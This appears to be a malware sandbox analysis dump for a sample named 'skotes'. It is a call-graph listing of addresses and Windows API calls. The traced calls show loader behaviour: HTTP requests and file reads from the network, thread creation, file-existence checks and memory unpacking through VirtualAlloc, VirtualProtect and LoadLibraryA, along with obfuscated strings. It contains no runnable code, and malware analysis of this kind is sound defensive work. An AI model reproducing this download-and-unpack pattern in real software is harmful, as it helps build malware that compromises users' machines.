60600->60617 60699 4098f0 60600->60699 60714 418200 27 API calls 60601->60714 60605 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60602->60605 60613 414c78 ~ListArray 60605->60613 60606 414f9c 60715 41c1d9 27 API calls 2 library calls 60606->60715 60607 4375f6 _free 14 API calls 60609 414ade 60607->60609 60710 438ab6 60609->60710 60610 414cec ~ListArray 60615 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60610->60615 60611 414fa6 60612 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60611->60612 60616 414fab 60612->60616 60613->60610 60613->60611 60618 414d05 60615->60618 60619 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60616->60619 60617->60550 60617->60606 60620 405c10 44 API calls 60618->60620 60619->60581 60621 414d0d 60620->60621 60622 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60621->60622 60625 414d68 ~ListArray 60622->60625 60623 414ddc ~ListArray 60624 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60623->60624 60626 414df7 60624->60626 60625->60616 60625->60623 60627 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60626->60627 60628 414e0c 60627->60628 60629 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60628->60629 60630 414e27 60629->60630 60631 405c10 44 API calls 60630->60631 60632 414e2e 60631->60632 60633 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60632->60633 60634 414e67 60633->60634 60679 414390 60634->60679 60637 40c281 60636->60637 60638 40be82 60636->60638 60639 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60637->60639 60638->60637 60640 40be96 Sleep InternetOpenW InternetConnectA 60638->60640 60646 40c22e ~ListArray 60639->60646 60641 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60640->60641 60642 40bf18 60641->60642 60644 405c10 44 API calls 60642->60644 60643 40c34f 60645 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60643->60645 60648 40bf23 HttpOpenRequestA 60644->60648 60649 40c354 60645->60649 60646->60643 60650 40c27c ~ListArray 60646->60650 60647 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60651 40c33c 60647->60651 60653 40bf4c ~ListArray 60648->60653 60650->60647 60651->60541 60654 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60653->60654 60655 40bfb4 60654->60655 60656 405c10 44 API calls 60655->60656 60657 40bfbf 60656->60657 60658 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60657->60658 60659 40bfd8 60658->60659 60660 405c10 44 API calls 60659->60660 60661 40bfe3 HttpSendRequestA 60660->60661 60663 40c006 ~ListArray 60661->60663 60664 40c08e InternetReadFile 60663->60664 60665 40c0b5 __InternalCxxFrameHandler 60664->60665 60666 40c13f InternetReadFile 60665->60666 60666->60665 60668 4085d5 ~ListArray 60667->60668 60673 4086a0 ~ListArray 60667->60673 60669 408767 60668->60669 60670 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60668->60670 60672 40876c 60668->60672 60668->60673 60716 418200 27 API calls 60669->60716 60670->60668 60674 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60672->60674 60673->60672 60678 408740 ~ListArray 60673->60678 60676 408771 60674->60676 60675 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60677 408763 60675->60677 60677->60549 60677->60617 60678->60675 60680 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60679->60680 60681 4143d2 60680->60681 60682 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60681->60682 60683 4143e4 60682->60683 60684 408580 27 API calls 60683->60684 60685 4143ed 60684->60685 60686 414646 60685->60686 60690 4143f8 ~ListArray 60685->60690 60687 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60686->60687 60688 414657 60687->60688 60689 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60688->60689 60691 41466c 60689->60691 60692 414610 ~ListArray 60690->60692 60697 4180c0 27 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 60690->60697 60698 417a00 29 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 60690->60698 60717 419280 60690->60717 60693 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60691->60693 60695 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60692->60695 60693->60692 60696 41479f 60695->60696 60696->60579 60697->60690 60698->60690 60700 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60699->60700 60701 40991e 60700->60701 60702 405c10 44 API calls 60701->60702 60703 409927 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 60702->60703 60704 4099c6 ~ListArray 60703->60704 60706 4099ed 60703->60706 60705 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60704->60705 60707 4099e9 60705->60707 60708 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60706->60708 60707->60607 60707->60617 60709 4099f2 60708->60709 60711 438ad1 60710->60711 60723 438868 60711->60723 60715->60611 60718 419294 60717->60718 60721 4192a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 60718->60721 60722 4194e0 27 API calls 4 library calls 60718->60722 60720 41932b 60720->60690 60721->60690 60722->60720 60741 43868d 60723->60741 60725 4388b3 60749 43690a 60725->60749 60727 43887a 60727->60725 60728 43888f 60727->60728 60740 43889f 60727->60740 60729 4375f6 _free 14 API calls 60728->60729 60730 438894 60729->60730 60748 436c5a 25 API calls __wsopen_s 60730->60748 60733 4388bf 60735 4388ee 60733->60735 60757 436d52 40 API calls 2 library calls 60733->60757 60734 438958 60759 438a8d 25 API calls 2 library calls 60734->60759 60735->60734 60758 438a8d 25 API calls 2 library calls 60735->60758 60738 438a20 60739 4375f6 _free 14 API calls 60738->60739 60738->60740 60739->60740 60740->60617 60742 438692 60741->60742 60743 4386a5 60741->60743 60744 4375f6 _free 14 API calls 60742->60744 60743->60727 60745 438697 60744->60745 60760 436c5a 25 API calls __wsopen_s 60745->60760 60747 4386a2 60747->60727 60748->60740 60750 43692a 60749->60750 60756 436921 60749->60756 60750->60756 60761 43a671 37 API calls 3 library calls 60750->60761 60752 43694a 60762 43b5fb 37 API calls __fassign 60752->60762 60754 436960 60763 43b628 37 API calls __fassign 60754->60763 60756->60733 60757->60733 60758->60734 60759->60738 60760->60747 60761->60752 60762->60754 60763->60756 60780 409ba5 GetFileAttributesA 60782 409bb5 ~ListArray 60780->60782 60781 40a91c 60784 40a953 60781->60784 60785 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60781->60785 60782->60781 60783 409c80 ~ListArray 60782->60783 60786 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60783->60786 60785->60784 60787 40a903 60786->60787 60788 43c1c4 60789 43c367 60788->60789 60791 43c1ee 60788->60791 60790 4375f6 _free 14 API calls 60789->60790 60807 43c352 60790->60807 60791->60789 60794 43c239 60791->60794 60792 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60793 43c384 60792->60793 60809 44292b 60794->60809 60798 43c26d 60799 43c386 60798->60799 60824 442165 60798->60824 60801 436c87 __wsopen_s 11 API calls 60799->60801 60803 43c392 60801->60803 60802 43c27f 60802->60799 60831 442191 60802->60831 60805 43c291 60805->60799 60806 43c29a 60805->60806 60806->60807 60838 442988 25 API calls 2 library calls 60806->60838 60807->60792 60810 442937 __FrameHandler3::FrameUnwindToState 60809->60810 60811 43c259 60810->60811 60839 438dc8 RtlEnterCriticalSection 60810->60839 60817 442139 60811->60817 60813 442948 60814 44295c 60813->60814 60840 44284d 60813->60840 60858 44297f RtlLeaveCriticalSection CallUnexpected 60814->60858 60818 442145 60817->60818 60819 44215a 60817->60819 60820 4375f6 _free 14 API calls 60818->60820 60819->60798 60821 44214a 60820->60821 60980 436c5a 25 API calls __wsopen_s 60821->60980 60823 442155 60823->60798 60825 442186 60824->60825 60826 442171 60824->60826 60825->60802 60827 4375f6 _free 14 API calls 60826->60827 60828 442176 60827->60828 60981 436c5a 25 API calls __wsopen_s 60828->60981 60830 442181 60830->60802 60832 4421b2 60831->60832 60833 44219d 60831->60833 60832->60805 60834 4375f6 _free 14 API calls 60833->60834 60835 4421a2 60834->60835 60982 436c5a 25 API calls __wsopen_s 60835->60982 60837 4421ad 60837->60805 60838->60807 60839->60813 60841 442899 60840->60841 60856 4428a0 60841->60856 60958 43b04b 15 API calls 3 library calls 60841->60958 60843 442910 60845 44290d 60843->60845 60921 4426f2 60843->60921 60844 4428b8 60853 4428e5 60844->60853 60854 4428bf 60844->60854 60849 43adf5 _free 14 API calls 60845->60849 60847 442907 60859 442517 60847->60859 60850 44291b 60849->60850 60852 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60850->60852 60855 442929 60852->60855 60857 43adf5 _free 14 API calls 60853->60857 60959 43adf5 60854->60959 60855->60814 60856->60843 60856->60847 60857->60856 60858->60811 60860 442526 60859->60860 60861 442191 25 API calls 60860->60861 60862 44253c 60861->60862 60864 442139 25 API calls 60862->60864 60919 4426c1 60862->60919 60863 436c87 __wsopen_s 11 API calls 60866 4426f1 60863->60866 60865 44254e 60864->60865 60867 43adf5 _free 14 API calls 60865->60867 60871 4426c8 60865->60871 60865->60919 60868 442191 25 API calls 60866->60868 60869 44259e 60867->60869 60870 442717 60868->60870 60965 43b04b 15 API calls 3 library calls 60869->60965 60872 442842 60870->60872 60874 442139 25 API calls 60870->60874 60871->60845 60875 436c87 __wsopen_s 11 API calls 60872->60875 60877 442729 60874->60877 60880 44284c 60875->60880 60876 4425b6 60878 43adf5 _free 14 API calls 60876->60878 60877->60872 60879 442165 25 API calls 60877->60879 60885 4425c2 60878->60885 60881 44273b 60879->60881 60883 4428a0 60880->60883 60975 43b04b 15 API calls 3 library calls 60880->60975 60881->60872 60882 442744 60881->60882 60884 43adf5 _free 14 API calls 60882->60884 60888 442910 60883->60888 60891 442907 60883->60891 60886 44274f GetTimeZoneInformation 60884->60886 60885->60871 60966 43a1f1 25 API calls 2 library calls 60885->60966 60893 44276b 60886->60893 60904 442806 60886->60904 60890 4426f2 42 API calls 60888->60890 60898 44290d 60888->60898 60890->60898 60896 442517 42 API calls 60891->60896 60892 4425ec 60892->60919 60967 444a64 25 API calls 2 library calls 60892->60967 60972 43ef17 37 API calls 2 library calls 60893->60972 60894 4428b8 60895 4428bf 60894->60895 60905 4428e5 60894->60905 60901 43adf5 _free 14 API calls 60895->60901 60896->60898 60897 43adf5 _free 14 API calls 60900 44291b 60897->60900 60898->60897 60902 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60900->60902 60901->60883 60906 442929 60902->60906 60904->60845 60908 43adf5 _free 14 API calls 60905->60908 60906->60845 60907 4427be 60973 43e926 WideCharToMultiByte 60907->60973 60908->60883 60910 442605 60910->60919 60968 438bbe 40 API calls 60910->60968 60912 4427d7 60974 43e926 WideCharToMultiByte 60912->60974 60914 44262a 60915 442680 60914->60915 60969 438bbe 40 API calls 60914->60969 60915->60871 60971 444a64 25 API calls 2 library calls 60915->60971 60917 442651 60917->60915 60970 438bbe 40 API calls 60917->60970 60919->60863 60919->60871 60922 442701 60921->60922 60923 442191 25 API calls 60922->60923 60924 442717 60923->60924 60925 442842 60924->60925 60926 442139 25 API calls 60924->60926 60927 436c87 __wsopen_s 11 API calls 60925->60927 60928 442729 60926->60928 60930 44284c 60927->60930 60928->60925 60929 442165 25 API calls 60928->60929 60931 44273b 60929->60931 60948 4428a0 60930->60948 60979 43b04b 15 API calls 3 library calls 60930->60979 60931->60925 60932 442744 60931->60932 60933 43adf5 _free 14 API calls 60932->60933 60934 44274f GetTimeZoneInformation 60933->60934 60944 44276b 60934->60944 60955 442806 60934->60955 60936 442910 60937 44290d 60936->60937 60938 4426f2 42 API calls 60936->60938 60942 43adf5 _free 14 API calls 60937->60942 60938->60937 60939 442907 60941 442517 42 API calls 60939->60941 60940 4428bf 60945 43adf5 _free 14 API calls 60940->60945 60941->60937 60943 44291b 60942->60943 60947 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60943->60947 60976 43ef17 37 API calls 2 library calls 60944->60976 60945->60948 60946 4428b8 60946->60940 60950 4428e5 60946->60950 60951 442929 60947->60951 60948->60936 60948->60939 60953 43adf5 _free 14 API calls 60950->60953 60951->60845 60952 4427be 60977 43e926 WideCharToMultiByte 60952->60977 60953->60948 60955->60845 60956 4427d7 60978 43e926 WideCharToMultiByte 60956->60978 60958->60844 60960 43ae00 HeapFree 60959->60960 60961 43ae29 _free 60959->60961 60960->60961 60962 43ae15 60960->60962 60961->60856 60963 4375f6 _free 12 API calls 60962->60963 60964 43ae1b GetLastError 60963->60964 60964->60961 60965->60876 60966->60892 60967->60910 60968->60914 60969->60917 60970->60915 60971->60919 60972->60907 60973->60912 60974->60904 60975->60894 60976->60952 60977->60956 60978->60955 60979->60946 60980->60823 60981->60830 60982->60837 60983 40a54d GetFileAttributesA 60985 40a55d ~ListArray 60983->60985 60984 40a944 60986 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60984->60986 60985->60984 60987 40a628 ~ListArray 60985->60987 60988 40a949 60986->60988 60990 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60987->60990 60989 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60988->60989 60992 40a94e 60989->60992 60991 40a903 60990->60991 60993 40a953 60992->60993 60994 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60992->60994 60994->60993 61003 43ac53 61008 43aa29 61003->61008 61006 43ac92 61009 43aa48 61008->61009 61010 43aa5b 61009->61010 61014 43aa70 61009->61014 61011 4375f6 _free 14 API calls 61010->61011 61012 43aa60 61011->61012 61028 436c5a 25 API calls __wsopen_s 61012->61028 61023 43ab90 61014->61023 61029 44132b 37 API calls 2 library calls 61014->61029 61015 43aa6b 61015->61006 61025 441a9c 61015->61025 61016 4375f6 _free 14 API calls 61017 43ac41 61016->61017 61032 436c5a 25 API calls __wsopen_s 61017->61032 61020 43abe0 61020->61023 61030 44132b 37 API calls 2 library calls 61020->61030 61022 43abfe 61022->61023 61031 44132b 37 API calls 2 library calls 61022->61031 61023->61015 61023->61016 61033 441461 61025->61033 61028->61015 61029->61020 61030->61022 61031->61023 61032->61015 61036 44146d __FrameHandler3::FrameUnwindToState 61033->61036 61034 441474 61035 4375f6 _free 14 API calls 61034->61035 61037 441479 61035->61037 61036->61034 61038 44149f 61036->61038 61053 436c5a 25 API calls __wsopen_s 61037->61053 61044 441a2e 61038->61044 61043 441483 61043->61006 61055 43698d 61044->61055 61049 441a64 61051 4414c3 61049->61051 61052 43adf5 _free 14 API calls 61049->61052 61054 4414f6 RtlLeaveCriticalSection __wsopen_s 61051->61054 61052->61051 61053->61043 61054->61043 61056 43690a __fassign 37 API calls 61055->61056 61057 43699f 61056->61057 61059 4369b1 61057->61059 61110 43b307 5 API calls __wsopen_s 61057->61110 61060 4368ed 61059->61060 61111 43683b 61060->61111 61063 441abc 61135 44180a 61063->61135 61066 441b07 61152 43bf3a 61066->61152 61067 441aee 61166 4375e3 14 API calls __dosmaperr 61067->61166 61071 441b15 61167 4375e3 14 API calls __dosmaperr 61071->61167 61072 441b2c 61165 441775 CreateFileW 61072->61165 61075 4375f6 _free 14 API calls 61101 441b00 61075->61101 61076 441b1a 61077 4375f6 _free 14 API calls 61076->61077 61084 441af3 61077->61084 61078 441be2 GetFileType 61079 441bed GetLastError 61078->61079 61086 441c34 61078->61086 61170 4375c0 14 API calls 2 library calls 61079->61170 61080 441bb7 GetLastError 61169 4375c0 14 API calls 2 library calls 61080->61169 61082 441b65 61082->61078 61082->61080 61168 441775 CreateFileW 61082->61168 61084->61075 61085 441bfb CloseHandle 61085->61084 61088 441c24 61085->61088 61171 43be85 15 API calls 3 library calls 61086->61171 61091 4375f6 _free 14 API calls 61088->61091 61090 441baa 61090->61078 61090->61080 61093 441c29 61091->61093 61092 441c55 61094 441ca1 61092->61094 61172 441984 71 API calls 3 library calls 61092->61172 61093->61084 61098 441ca8 61094->61098 61174 441522 71 API calls 2 library calls 61094->61174 61097 441cd6 61097->61098 61099 441ce4 61097->61099 61173 43af48 28 API calls 2 library calls 61098->61173 61099->61101 61102 441d60 CloseHandle 61099->61102 61101->61049 61175 441775 CreateFileW 61102->61175 61104 441d8b 61105 441d95 GetLastError 61104->61105 61109 441caf 61104->61109 61176 4375c0 14 API calls 2 library calls 61105->61176 61107 441da1 61177 43c04d 15 API calls 3 library calls 61107->61177 61109->61101 61110->61059 61112 436863 61111->61112 61113 436849 61111->61113 61114 436889 61112->61114 61116 43686a 61112->61116 61129 4369cc 14 API calls _free 61113->61129 61131 43b099 MultiByteToWideChar 61114->61131 61128 436853 61116->61128 61130 4369e6 15 API calls __wsopen_s 61116->61130 61119 436898 61120 43689f GetLastError 61119->61120 61121 4368c5 61119->61121 61133 4369e6 15 API calls __wsopen_s 61119->61133 61132 4375c0 14 API calls 2 library calls 61120->61132 61121->61128 61134 43b099 MultiByteToWideChar 61121->61134 61125 4368ab 61127 4375f6 _free 14 API calls 61125->61127 61126 4368dc 61126->61120 61126->61128 61127->61128 61128->61049 61128->61063 61129->61128 61130->61128 61131->61119 61132->61125 61133->61121 61134->61126 61136 441845 61135->61136 61137 44182b 61135->61137 61178 44179a 61136->61178 61137->61136 61139 4375f6 _free 14 API calls 61137->61139 61140 44183a 61139->61140 61185 436c5a 25 API calls __wsopen_s 61140->61185 61142 44187d 61143 4418ac 61142->61143 61144 4375f6 _free 14 API calls 61142->61144 61150 4418ff 61143->61150 61187 439b60 25 API calls 2 library calls 61143->61187 61147 4418a1 61144->61147 61146 4418fa 61149 436c87 __wsopen_s 11 API calls 61146->61149 61146->61150 61186 436c5a 25 API calls __wsopen_s 61147->61186 61151 441983 61149->61151 61150->61066 61150->61067 61153 43bf46 __FrameHandler3::FrameUnwindToState 61152->61153 61189 438dc8 RtlEnterCriticalSection 61153->61189 61155 43bf4d 61157 43bf72 61155->61157 61161 43bfe1 RtlEnterCriticalSection 61155->61161 61162 43bf94 61155->61162 61193 43bd14 15 API calls 3 library calls 61157->61193 61160 43bf77 61160->61162 61194 43be62 RtlEnterCriticalSection 61160->61194 61161->61162 61163 43bfee RtlLeaveCriticalSection 61161->61163 61190 43c044 61162->61190 61163->61155 61165->61082 61166->61084 61167->61076 61168->61090 61169->61084 61170->61085 61171->61092 61172->61094 61173->61109 61174->61097 61175->61104 61176->61107 61177->61109 61180 4417b2 61178->61180 61179 4417cd 61179->61142 61180->61179 61181 4375f6 _free 14 API calls 61180->61181 61182 4417f1 61181->61182 61188 436c5a 25 API calls __wsopen_s 61182->61188 61184 4417fc 61184->61142 61185->61136 61186->61143 61187->61146 61188->61184 61189->61155 61195 438e10 RtlLeaveCriticalSection 61190->61195 61192 43bfb4 61192->61071 61192->61072 61193->61160 61194->61162 61195->61192 61196 407590 Sleep 61197 40765e 61196->61197 61198 4075e3 61196->61198 61199 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 61197->61199 61214 41d111 6 API calls 61198->61214 61201 40767a 61199->61201 61203 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 61201->61203 61202 4075ed 61202->61197 61215 41d64e 28 API calls 61202->61215 61204 407693 61203->61204 61207 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 61204->61207 61206 407654 61216 41d0c7 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61206->61216 61209 4076ac CreateThread Sleep 61207->61209 61210 4076d9 ~ListArray 61209->61210 61217 407430 61209->61217 61211 40777f ~ListArray 61210->61211 61212 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61210->61212 61213 4077a0 61212->61213 61214->61202 61215->61206 61216->61197 61218 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61217->61218 61219 407465 61218->61219 61220 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61219->61220 61221 407478 61220->61221 61222 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61221->61222 61223 407488 61222->61223 61224 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61223->61224 61225 40749d 61224->61225 61226 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61225->61226 61227 4074b2 61226->61227 61228 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 61227->61228 61230 4074c4 ~ListArray 61228->61230 61229 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 61231 407581 61229->61231 61230->61229 61240 40a418 GetFileAttributesA 61241 40a428 ~ListArray 61240->61241 61242 40a4f3 ~ListArray 61241->61242 61243 40a93f 61241->61243 61247 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 61242->61247 61244 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61243->61244 61245 40a944 61244->61245 61246 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61245->61246 61249 40a949 61246->61249 61248 40a903 61247->61248 61250 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61249->61250 61251 40a94e 61250->61251 61252 40a953 61251->61252 61253 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61251->61253 61253->61252 61254 40a079 GetFileAttributesA 61257 40a089 ~ListArray 61254->61257 61255 40a930 61256 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 61255->61256 61258 40a953 61256->61258 61257->61255 61259 40a154 ~ListArray 61257->61259 61260 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 61259->61260 61261 40a903 61260->61261 61262 436dda 61263 436df6 61262->61263 61264 436de8 61262->61264 61266 43698d __wsopen_s 37 API calls 61263->61266 61265 436e4c 57 API calls 61264->61265 61267 436df2 61265->61267 61268 436e10 61266->61268 61269 4368ed __wsopen_s 17 API calls 61268->61269 61270 436e1d 61269->61270 61272 436e24 61270->61272 61275 436e4c 61270->61275 61273 436e46 61272->61273 61274 43adf5 _free 14 API calls 61272->61274 61274->61273 61276 436e77 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 61275->61276 61277 436e5a 61275->61277 61280 436eb9 CreateFileW 61276->61280 61281 436e9d 61276->61281 61324 4375e3 14 API calls __dosmaperr 61277->61324 61279 436e5f 61282 4375f6 _free 14 API calls 61279->61282 61284 436eeb 61280->61284 61285 436edd 61280->61285 61326 4375e3 14 API calls __dosmaperr 61281->61326 61286 436e67 61282->61286 61328 436f2a 49 API calls __dosmaperr 61284->61328 61298 436fb4 GetFileType 61285->61298 61325 436c5a 25 API calls __wsopen_s 61286->61325 61287 436ea2 61291 4375f6 _free 14 API calls 61287->61291 61293 436ea9 61291->61293 61292 436e72 61292->61272 61327 436c5a 25 API calls __wsopen_s 61293->61327 61295 436ee6 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 61296 436eb4 61295->61296 61297 436f1c CloseHandle 61295->61297 61296->61272 61297->61296 61299 436fef 61298->61299 61300 4370a1 61298->61300 61305 437009 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 61299->61305 61346 43732a 21 API calls __dosmaperr 61299->61346 61301 4370cd 61300->61301 61304 4370ab 61300->61304 61302 4370f7 PeekNamedPipe 61301->61302 61313 437098 61301->61313 61302->61313 61307 4370af 61304->61307 61308 4370be GetLastError 61304->61308 61306 437028 GetFileInformationByHandle 61305->61306 61305->61313 61306->61308 61311 43703e 61306->61311 61312 4375f6 _free 14 API calls 61307->61312 61348 4375c0 14 API calls 2 library calls 61308->61348 61310 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 61314 437122 61310->61314 61329 43727c 61311->61329 61312->61313 61313->61310 61314->61295 61319 437124 7 API calls 61320 43706e 61319->61320 61321 437124 7 API calls 61320->61321 61322 437085 61321->61322 61347 437249 14 API calls _free 61322->61347 61324->61279 61325->61292 61326->61287 61327->61296 61328->61295 61331 437292 _wcsrchr 61329->61331 61330 43704a 61339 437124 61330->61339 61331->61330 61349 43bc13 38 API calls 2 library calls 61331->61349 61333 4372d6 61333->61330 61350 43bc13 38 API calls 2 library calls 61333->61350 61335 4372e7 61335->61330 61351 43bc13 38 API calls 2 library calls 61335->61351 61337 4372f8 61337->61330 61352 43bc13 38 API calls 2 library calls 61337->61352 61340 43714a FileTimeToSystemTime 61339->61340 61341 43713c 61339->61341 61342 43715c SystemTimeToTzSpecificLocalTime 61340->61342 61345 437142 61340->61345 61341->61340 61341->61345 61342->61345 61343 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 61344 43705b 61343->61344 61344->61319 61345->61343 61346->61305 61347->61313 61348->61313 61349->61333 61350->61335 61351->61337 61352->61330 61361 6d0756 61362 6d0765 61361->61362 61365 6d0ef6 61362->61365 61366 6d0f11 61365->61366 61367 6d0f1a CreateToolhelp32Snapshot 61366->61367 61368 6d0f36 Module32First 61366->61368 61367->61366 61367->61368 61369 6d076e 61368->61369 61370 6d0f45 61368->61370 61372 6d0bb5 61370->61372 61373 6d0be0 61372->61373 61374 6d0c29 61373->61374 61375 6d0bf1 VirtualAlloc 61373->61375 61374->61374 61375->61374 61376 62003c 61377 620049 61376->61377 61391 620e0f SetErrorMode SetErrorMode 61377->61391 61382 620265 61383 6202ce VirtualProtect 61382->61383 61385 62030b 61383->61385 61384 620439 VirtualFree 61389 6205f4 LoadLibraryA 61384->61389 61390 6204be 61384->61390 61385->61384 61386 6204e3 LoadLibraryA 61386->61390 61388 6208c7 61389->61388 61390->61386 61390->61389 61392 620223 61391->61392 61393 620d90 61392->61393 61394 620dad 61393->61394 61395 620238 VirtualAlloc 61394->61395 61396 620dbb GetPEB 61394->61396 61395->61382 61396->61395

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 723 40e530-40e843 call 417a00 call 405c10 call 417a00 call 405c10 call 419280 call 418320 call 418220 call 418320 call 417a00 * 3 call 40be30 call 417a00 * 2 call 405c10 call 408580 761 40ea1a-40ea62 723->761 762 40e8ce-40e9ec 723->762 761->762 765 40ea8f-40ea96 call 41d663 761->765 771 40ea99-40eab2 call 41cff1 762->771 772 40e9f2-40e9fe 762->772 765->771 772->765 774 40ea04-40ea12 772->774 774->761 776 40eab8-40ee79 call 436c6a * 2 call 417a00 call 405c10 call 4183c0 call 418220 GetFileAttributesA call 417a00 call 405c10 call 4183c0 call 418220 GetFileAttributesA 774->776 811 40f273-40f28b 776->811 812 40f5bb-40f66c call 4180c0 776->812 813 40f291-40f29d 811->813 814 40f6a3-40f6b6 811->814 812->811 817 40f699-40f6a0 call 41d663 812->817 816 40f2a3-40f2b1 813->816 813->817 816->812 821 40f6cb-40f962 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 call 4180c0 call 417a00 call 4180c0 * 2 CreateThread 816->821 817->814 854 40f964-40f970 821->854 855 40f98c-40f9a5 call 41cff1 821->855 856 40f982-40f989 call 41d663 854->856 857 40f972-40f980 854->857 856->855 857->856 859 40f9ab-40fb15 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 closesocket CloseHandle 857->859 882 40fb17-40fb23 859->882 883 40fb3f-40fb4e 859->883 884 40fb35-40fb3c call 41d663 882->884 885 40fb25-40fb33 882->885 884->883 885->884 886 40fb4f-40fc6f call 436c6a call 417a00 call 409580 call 409230 call 418320 GetModuleFileNameA 885->886 901 40fc70-40fc75 886->901 901->901 902 40fc77-410860 call 4180c0 call 417a00 * 2 call 40c360 call 436729 call 417a00 call 405c10 call 417a00 * 4 call 40e530 901->902 937 410862-41086e 902->937 938 41088a-4108a5 call 41cff1 902->938 939 410880-410887 call 41d663 937->939 940 410870-41087e 937->940 939->938 940->939 942 4108ce-4112e4 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 940->942 964 4112e9-411537 942->964
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1F$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                    • API String ID: 0-2926265604
                    • Opcode ID: 426d9788ca16a23a6facdfbd94b949207d28870cf9fc2e2172fd233b1d046d74
                    • Instruction ID: 65779ac6005c898698e037a0c1c56422f5b0cc6d1c66e7942cae940dc5a342c6
                    • Opcode Fuzzy Hash: 426d9788ca16a23a6facdfbd94b949207d28870cf9fc2e2172fd233b1d046d74
